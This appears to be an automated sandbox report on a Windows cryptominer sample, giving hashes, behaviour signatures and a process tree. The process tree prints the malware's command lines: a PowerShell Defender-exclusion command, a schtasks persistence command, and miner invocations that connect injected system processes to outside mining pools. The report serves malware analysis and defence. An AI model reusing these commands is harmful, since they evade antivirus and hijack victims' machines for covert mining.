Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
297s -
max time network
46s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
24/09/2022, 22:18
Static task
static1
Behavioral task
behavioral1
Sample
2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe
Resource
win10-20220901-en
General
-
Target
2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe
-
Size
861KB
-
MD5
2d0b3156196bbd5df81d32c03fbb50ec
-
SHA1
2c0f76119a6f47ab0512cc7511213a75f8ad04c3
-
SHA256
2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536
-
SHA512
8011935ea774ecc5e1c3ba3bbc8d788b49eedbebb4422fb0c29e4967439b51b22986d12d9ba1996469face07a227517f57e88ff8766e41354b982ddc42ca1260
-
SSDEEP
6144:PvziFSXpvg8dhIheZZ1IZfgo7bx2jC/Yx4n0fdWHqqEXgiKJ2wm3sQLU8uZq1QNM:1Zv0ozIiYbIb4lHc/a0YZg9Bj
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 1700 DHUZT.exe 1904 DHUZT.exe -
resource yara_rule behavioral1/memory/1716-101-0x0000000140000000-0x0000000142EFE000-memory.dmp upx behavioral1/memory/1716-103-0x0000000140000000-0x0000000142EFE000-memory.dmp upx behavioral1/memory/1716-104-0x0000000140000000-0x0000000142EFE000-memory.dmp upx behavioral1/memory/1716-106-0x0000000140000000-0x0000000142EFE000-memory.dmp upx -
Loads dropped DLL 1 IoCs
pid Process 1116 cmd.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1700 set thread context of 2012 1700 DHUZT.exe 39 PID 1700 set thread context of 1716 1700 DHUZT.exe 42 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1276 schtasks.exe 1408 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1976 timeout.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2036 powershell.exe 1316 powershell.exe 1700 DHUZT.exe 1700 DHUZT.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1756 2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe Token: SeDebugPrivilege 2036 powershell.exe Token: SeDebugPrivilege 1700 DHUZT.exe Token: SeDebugPrivilege 1316 powershell.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 1756 wrote to memory of 2036 1756 2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe 27 PID 1756 wrote to memory of 2036 1756 2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe 27 PID 1756 wrote to memory of 2036 1756 2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe 27 PID 1756 wrote to memory of 1116 1756 2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe 29 PID 1756 wrote to memory of 1116 1756 2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe 29 PID 1756 wrote to memory of 1116 1756 2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe 29 PID 1116 wrote to memory of 1976 1116 cmd.exe 31 PID 1116 wrote to memory of 1976 1116 cmd.exe 31 PID 1116 wrote to memory of 1976 1116 cmd.exe 31 PID 1116 wrote to memory of 1700 1116 cmd.exe 32 PID 1116 wrote to memory of 1700 1116 cmd.exe 32 PID 1116 wrote to memory of 1700 1116 cmd.exe 32 PID 1700 wrote to memory of 1316 1700 DHUZT.exe 34 PID 1700 wrote to memory of 1316 1700 DHUZT.exe 34 PID 1700 wrote to memory of 1316 1700 DHUZT.exe 34 PID 1700 wrote to memory of 832 1700 DHUZT.exe 37 PID 1700 wrote to memory of 832 1700 DHUZT.exe 37 PID 1700 wrote to memory of 832 1700 DHUZT.exe 37 PID 832 wrote to memory of 1408 832 cmd.exe 36 PID 832 wrote to memory of 1408 832 cmd.exe 36 PID 832 wrote to memory of 1408 832 cmd.exe 36 PID 1700 wrote to memory of 2012 1700 DHUZT.exe 39 PID 1700 wrote to memory of 2012 1700 DHUZT.exe 39 PID 1700 wrote to memory of 2012 1700 DHUZT.exe 39 PID 1700 wrote to memory of 2012 1700 DHUZT.exe 39 PID 1700 wrote to memory of 2012 1700 DHUZT.exe 39 PID 1700 wrote to memory of 2012 1700 DHUZT.exe 39 PID 1700 wrote to memory of 2012 1700 DHUZT.exe 39 PID 1700 wrote to memory of 2012 1700 DHUZT.exe 39 PID 1700 wrote to memory of 2012 1700 DHUZT.exe 39 PID 1700 wrote to memory of 2012 1700 DHUZT.exe 39 PID 1700 wrote to memory of 2012 1700 DHUZT.exe 39 PID 1700 wrote to memory of 2012 1700 DHUZT.exe 39 PID 1700 wrote to memory of 2012 1700 DHUZT.exe 39 PID 1700 wrote to memory of 2012 1700 DHUZT.exe 39 PID 1700 wrote to memory of 2012 1700 DHUZT.exe 39 PID 2012 wrote to memory of 1124 2012 vbc.exe 41 PID 2012 wrote to memory of 1124 2012 vbc.exe 41 PID 2012 wrote to memory of 1124 2012 vbc.exe 41 PID 1700 wrote to memory of 1716 1700 DHUZT.exe 42 PID 1700 wrote to memory of 1716 1700 DHUZT.exe 42 PID 1700 wrote to memory of 1716 1700 DHUZT.exe 42 PID 1700 wrote to memory of 1716 1700 DHUZT.exe 42 PID 1700 wrote to memory of 1716 1700 DHUZT.exe 42 PID 1700 wrote to memory of 1716 1700 DHUZT.exe 42 PID 1700 wrote to memory of 1716 1700 DHUZT.exe 42 PID 1004 wrote to memory of 1904 1004 taskeng.exe 44 PID 1004 wrote to memory of 1904 1004 taskeng.exe 44 PID 1004 wrote to memory of 1904 1004 taskeng.exe 44
Processes
-
C:\Users\Admin\AppData\Local\Temp\2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe"C:\Users\Admin\AppData\Local\Temp\2646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp4A3.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:1976
-
-
C:\ProgramData\ccl\DHUZT.exe"C:\ProgramData\ccl\DHUZT.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:832
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.NewWorker -p x -t 74⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls5⤵PID:1124
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --algo AUTOLYKOS2 --pool stratum-ergo.flypool.org:3333 --user 9iBvw2uK1JJsATyKTNiKktuaQoekhEZFedBvKvsoL36t4dsjmLu.apocalypse4⤵PID:1716
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"1⤵
- Creates scheduled task(s)
PID:1408
-
C:\Windows\system32\taskeng.exetaskeng.exe {4E84CA1A-2F96-4541-ACBB-BCF2D1BD3167} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\ProgramData\ccl\DHUZT.exeC:\ProgramData\ccl\DHUZT.exe2⤵
- Executes dropped EXE
PID:1904 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"3⤵PID:1996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵PID:1876
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGvbrbsSuWBAhQiVVqYY73R6VMCC1AwQYi.NewWorker -p x -t 73⤵PID:940
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls4⤵PID:1160
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "DHUZT" /tr "C:\ProgramData\ccl\DHUZT.exe"1⤵
- Creates scheduled task(s)
PID:1276
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
861KB
MD52d0b3156196bbd5df81d32c03fbb50ec
SHA12c0f76119a6f47ab0512cc7511213a75f8ad04c3
SHA2562646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536
SHA5128011935ea774ecc5e1c3ba3bbc8d788b49eedbebb4422fb0c29e4967439b51b22986d12d9ba1996469face07a227517f57e88ff8766e41354b982ddc42ca1260
-
Filesize
861KB
MD52d0b3156196bbd5df81d32c03fbb50ec
SHA12c0f76119a6f47ab0512cc7511213a75f8ad04c3
SHA2562646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536
SHA5128011935ea774ecc5e1c3ba3bbc8d788b49eedbebb4422fb0c29e4967439b51b22986d12d9ba1996469face07a227517f57e88ff8766e41354b982ddc42ca1260
-
Filesize
861KB
MD52d0b3156196bbd5df81d32c03fbb50ec
SHA12c0f76119a6f47ab0512cc7511213a75f8ad04c3
SHA2562646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536
SHA5128011935ea774ecc5e1c3ba3bbc8d788b49eedbebb4422fb0c29e4967439b51b22986d12d9ba1996469face07a227517f57e88ff8766e41354b982ddc42ca1260
-
Filesize
386KB
MD5b447cdc6fdce1fe450c1c746218cd4b2
SHA1f1aa7aae895c7727d2184d885854c949d00ab561
SHA25663074c03de19a055b423d906af02c1836f2ece77a9c143e7c36827e0adbb54b6
SHA5120f6263c99d241f05317af0da38b09c32e6e921bfa9ff2df6e5a7821fbd8875c467f2e7c252e08885af08b6a7cb3b5c4315cf0162f7c2a5ce4ec00e69dfad5b26
-
Filesize
136B
MD5d39bba612338be9c4322d2afa16a6b04
SHA1e1e573d044920aa5eaccde1ccfdd9d91c07e2b77
SHA256fc155f7c9f7b8dbfcd9ccabd7b4d68749a780506b28cfedd0645d9ebce6180f1
SHA512a175fe57eebf7cd672c5668ab9ec1945044c3d63acc6a1f144c78f6fcf9bc44fdec915bf25612643d831bbfa589806fd528bd17d3eb819bf96c1da03e859eb6f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f6f1e53936dc581c1799ebfca570bf65
SHA187dbe7b4ba8d6617d57c2f9d7874bfb346505c0e
SHA2564fc616be333448d44043329a0c7a3590ab0b45669ce8ec9b3cb437be41c44574
SHA512498b722bc5eca222c87596e5d31c465ae7af178ad0d1ab201a1f15d5f38bec763d777a68c85f1056a8851294248792e65dd8264db09565fb8901264e2e6d3f5b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f6f1e53936dc581c1799ebfca570bf65
SHA187dbe7b4ba8d6617d57c2f9d7874bfb346505c0e
SHA2564fc616be333448d44043329a0c7a3590ab0b45669ce8ec9b3cb437be41c44574
SHA512498b722bc5eca222c87596e5d31c465ae7af178ad0d1ab201a1f15d5f38bec763d777a68c85f1056a8851294248792e65dd8264db09565fb8901264e2e6d3f5b
-
Filesize
861KB
MD52d0b3156196bbd5df81d32c03fbb50ec
SHA12c0f76119a6f47ab0512cc7511213a75f8ad04c3
SHA2562646e3884a2bc91247698a515e3b7b6e859496a4f68a80b63c0ff4c02af77536
SHA5128011935ea774ecc5e1c3ba3bbc8d788b49eedbebb4422fb0c29e4967439b51b22986d12d9ba1996469face07a227517f57e88ff8766e41354b982ddc42ca1260